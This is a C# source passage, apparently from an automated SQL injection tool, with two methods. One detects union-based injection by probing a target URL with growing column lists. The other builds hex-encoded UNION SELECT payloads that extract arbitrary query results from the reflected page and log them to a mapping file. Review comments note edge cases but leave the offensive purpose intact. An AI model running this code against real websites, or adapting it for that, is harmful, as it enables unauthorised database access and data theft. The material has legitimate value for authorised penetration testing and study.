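        /// <summary>
        /// Runs the custom query described by <c>PayloadDetails</c> through the union-based
        /// injection point and returns the values reflected back by the page, using every
        /// visible column of the UNION as a separate output slot.
        /// </summary>
        /// <param name="startingFrom">
        /// Row offset handed to the DBMS-specific single-result limiter when
        /// <c>PayloadDetails.ExpectedResultType</c> is <c>Multiple</c>; column position
        /// <c>j</c> of the UNION is asked for row <c>startingFrom + j</c>.
        /// </param>
        /// <returns>
        /// The extracted values, each followed by <c>Environment.NewLine</c>, in the order they
        /// were found in the response; an empty string when nothing matched.
        /// </returns>
        /// <exception cref="InvalidOperationException">
        /// <c>ExploitDetails</c> is null (its <c>Exploit</c> template is needed to build the request).
        /// </exception>
        /// <remarks>
        /// Everything parsed out of the response is target-controlled: it is written to the
        /// mapping file (when one is configured) and returned verbatim, so callers must not
        /// render it as HTML or feed it to a shell/SQL unescaped. The original
        /// "@TODO: strip scripts" still applies. Whether <c>XmlHelpers.SaveToMappingFile</c>
        /// escapes the value for XML cannot be seen from here — verify.
        /// </remarks>
        public string GetSingleCustomQueryResultRow(int startingFrom)
        {
            // ExploitDetails.Exploit is dereferenced below; the mapping-file code used to guard
            // against a null ExploitDetails, so fail early with a clear message instead of a
            // NullReferenceException halfway through.
            if (ExploitDetails == null)
            {
                throw new InvalidOperationException("ExploitDetails must be set before extracting results");
            }

            // Substitute the {N} placeholders of the payload template with per-parameter data.
            string generatedPayload = PayloadDetails.Payload;
            if (PayloadDetails.Params != null && PayloadDetails.Params.Any())
            {
                foreach (var param in PayloadDetails.Params)
                {
                    generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
                }
            }

            // The limiter format depends only on the DBMS, so look it up once rather than per column.
            bool   limitToSingleRow = PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple;
            string limiterFormat    = limitToSingleRow ? PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms) : null;

            // Build the column list of the UNION SELECT: visible columns carry the wrapped payload,
            // the others just echo their position so the column count still matches.
            StringBuilder sbCurExploit  = new StringBuilder();
            int           visibleOrdinal = 0;

            for (int j = 0; j < _nrCols; j++)
            {
                if (j > 0)
                {
                    sbCurExploit.Append(",");
                }

                if (!_visibleColumnIndexes.Contains(j))
                {
                    // Plain positional filler; invariant culture because this goes into the query.
                    sbCurExploit.Append(j.ToString(System.Globalization.CultureInfo.InvariantCulture));
                    continue;
                }

                string columnPayload = generatedPayload;
                if (limitToSingleRow)
                {
                    // NOTE(review): the row offset is startingFrom + j (column position), not
                    // startingFrom + visibleOrdinal, so with non-contiguous visible columns
                    // (e.g. {0, 2}) the offset startingFrom + 1 is never requested by this call.
                    // Kept as in the original; confirm the caller's stepping accounts for it.
                    columnPayload = string.Format(limiterFormat, generatedPayload, startingFrom + j);
                }

                // Wrapper = Part1 + hex(Part2 tagged with the visible column index) + Part3(payload).
                // The tag is what lets the response parser below attribute a value to a column.
                sbCurExploit.Append(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart1);
                sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart2,
                                                                            _visibleColumnIndexes[visibleOrdinal])));
                sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart3, columnPayload);

                visibleOrdinal++;
            }

            string         query        = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
            string         pageHtml     = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
            IList <string> resultsBatch = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);

            StringBuilder sbResult         = new StringBuilder();
            HashSet <int> columnsProcessed = new HashSet <int>();
            string        separator        = GeneralPayloads.UnionBasedResultSeparator;

            foreach (string singleResult in resultsBatch)
            {
                //@TODO: strip scripts
                // Each answer is "<columnIndex><separator><value>"; anything else is ignored.
                // Ordinal search: the separator is a machine token, not linguistic text.
                int separatorIndex = singleResult.IndexOf(separator, StringComparison.Ordinal);
                if (separatorIndex != -1)
                {
                    int    columnIndex;
                    string columnIndexString = singleResult.Substring(0, separatorIndex);

                    // HashSet.Add is false for a repeated index, so each column is reported once.
                    if (int.TryParse(columnIndexString, System.Globalization.NumberStyles.Integer,
                                     System.Globalization.CultureInfo.InvariantCulture, out columnIndex)
                        && columnsProcessed.Add(columnIndex))
                    {
                        string actualValue = singleResult.Substring(separatorIndex + separator.Length);

                        if (!string.IsNullOrEmpty(MappingFile))
                        {
                            XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, actualValue, this, ExploitDetails.Dbms);
                        }

                        sbResult.Append(actualValue);
                        sbResult.Append(Environment.NewLine);
                    }
                }

                // Stop once every visible column has produced a value.
                if (columnsProcessed.Count == _visibleColumnIndexes.Count)
                {
                    break;
                }
            }

            return(sbResult.ToString());
        }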
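        /// <summary>
        /// Probes the injection point for a union-based SQL injection: one more SELECT value is
        /// appended per iteration (up to <c>_maxCols</c>) until the response no longer shows the
        /// union error message, or starts echoing the test value. On success the column count
        /// and the indexes of the columns reflected in the page are recorded.
        /// </summary>
        /// <returns>
        /// <c>true</c> when the probe succeeded with more than one column and at least one column
        /// is reflected in the page; <c>false</c> otherwise. A match on the very first (single
        /// column) probe is reported as not vulnerable — that is the original behaviour, the
        /// reason is not documented here.
        /// </returns>
        /// <exception cref="InvalidOperationException">
        /// <c>Url</c> is empty or <c>ExploitDetails</c> is null; both are needed to build the request.
        /// </exception>
        /// <remarks>
        /// Side effects on success: <c>_nrCols</c>, <c>_visibleColumnIndexes</c> and
        /// <c>_nrVisibleCols</c> are set and, when <c>MappingFile</c> is configured, the mapping
        /// file's column entries are rewritten. Reflected answers are target-controlled text;
        /// those that are not integers are ignored rather than aborting the scan.
        /// </remarks>
        public bool TestIfVulnerable()
        {
            if (string.IsNullOrEmpty(Url))
            {
                throw new InvalidOperationException("No url provided so cannot test vulnerability");
            }

            // The original carried a "check if null because it breaks" note without the check.
            if (ExploitDetails == null)
            {
                throw new InvalidOperationException("No exploit details provided so cannot test vulnerability");
            }

            StringBuilder sbCurExploit = new StringBuilder();

            for (int i = 0; i < _maxCols; i++)
            {
                if (i > 0)
                {
                    sbCurExploit.Append(",");
                }

                // Each probe value carries its own column index (hex-encoded) so a reflected
                // column can be identified in the response.
                sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectValue, i)));

                string query    = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
                string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);

                // Error still shown and none of our values echoed: wrong column count, try one more.
                bool wrongColumnCount = pageHtml.Contains(GeneralPayloads.UnionBasedErrorMessage)
                                        && !pageHtml.Contains(GeneralPayloads.UnionBasedTestValue);
                if (wrongColumnCount)
                {
                    continue;
                }

                // Single-column match is not accepted as a positive (kept from the original).
                if (i == 0)
                {
                    return(false);
                }

                _nrCols = i + 1;

                // Collect the distinct reflected answers that are integer column indexes.
                // Invariant culture + TryParse: the page is untrusted and may echo anything.
                var         stringResults = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
                List <int>  reflected     = new List <int>();
                foreach (string answer in stringResults.Where(r => !string.IsNullOrEmpty(r)).Distinct())
                {
                    int index;
                    if (int.TryParse(answer, System.Globalization.NumberStyles.Integer,
                                     System.Globalization.CultureInfo.InvariantCulture, out index))
                    {
                        reflected.Add(index);
                    }
                }

                _visibleColumnIndexes = reflected;
                _nrVisibleCols        = _visibleColumnIndexes.Count;

                if (_nrVisibleCols == 0)
                {
                    return(false);
                }

                if (!string.IsNullOrEmpty(MappingFile))
                {
                    string dbms = ExploitDetails.Dbms;
                    XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/originalquery",
                                                             _nrCols.ToString(), this, dbms);
                    XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/resultinghtml",
                                                             _nrVisibleCols.ToString(), this, dbms);
                    XmlHelpers.ChangeMappingFileElementValue(MappingFile, "/map/injection-strategy/columns/indexes",
                                                             ListHelpers.ListToCommaSeparatedValues(_visibleColumnIndexes), this, dbms);
                }

                return(true);
            }

            // Exhausted _maxCols without the error message going away.
            return(false);
        }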